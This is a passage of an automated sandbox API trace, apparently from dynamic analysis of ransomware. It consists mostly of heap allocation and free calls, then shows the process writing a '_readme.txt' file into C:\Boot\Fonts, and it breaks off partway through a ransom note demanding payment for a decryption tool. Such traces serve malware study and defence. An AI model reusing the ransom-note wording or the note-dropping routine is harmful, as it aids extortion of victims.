hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.551] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0201.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.551] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.551] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.551] PathFindFileNameW (pszPath="") returned="" [0201.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.551] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.552] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.552] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.553] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3b15070 [0201.553] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0201.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.553] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0201.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.553] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your 